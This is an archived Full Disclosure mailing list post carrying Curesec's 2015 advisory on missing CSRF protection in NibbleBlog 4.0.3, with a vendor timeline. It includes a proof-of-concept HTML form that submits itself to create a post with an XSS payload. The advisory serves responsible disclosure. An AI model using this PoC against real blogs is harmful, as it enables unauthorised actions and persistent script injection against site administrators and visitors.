Full Disclosure mailing list archives
NibbleBlog 4.0.3 - CSRF - Not fixed
From: "Curesec Research Team (CRT)" <crt () curesec com>
Date: Tue, 1 Sep 2015 13:36:36 +0200
NibbleBlog 4.0.3: CSRF Security Advisory – Curesec Research Team 1. Introduction Affected Product: NibbleBlog 4.0.3 Fixed in: not fixed Fixed Version Link: n/a Vendor Contact: Website: http://www.nibbleblog.com/ Vulnerability Type: CSRF Remote Exploitable: Yes Reported to vendor: 07/21/2015 Disclosed to public: 09/01/2015 Release mode: Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Vulnerability Description NibbleBlog 4.0.3 does not have CSRF protection. This means that an attacker can perform actions for an admin if the admin is logged in and visits an attacker controlled website. In the case of NibbleBlog, this can for example lead to persistent XSS via the creation of a new post, which in turn allows for phishing attacks or the injection of JavaScript keyloggers. 3. Proof of Concept Create new Post (for Spam and XSS): <form id="myForm" action="http://localhost/nibbleblog/admin.php?controller=post&action=new_simple"; method="POST"> <input name="title" value="Interesting!"> <input name="content" value="visit <a href='http://example.com'>this</a>.<img src='no' onerror='alert(1)'>"> <input name="allow_comments" value="1"> <input name="id_cat" value="0"> </form> <script> document.getElementById("myForm").submit(); </script> 4. Solution This issue was not fixed by the vendor. 5. Report Timeline 07/21/2015 Informed Vendor about Issue 07/22/2015 Vendor Replied 08/18/2015 Reminded Vendor of release date (no reply) 09/01/2015 Disclosed to public 6. Blog Reference http://blog.curesec.com/article/blog/NibbleBlog-403-CSRF-46.html _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- NibbleBlog 4.0.3 - CSRF - Not fixed Curesec Research Team (CRT) (Sep 02)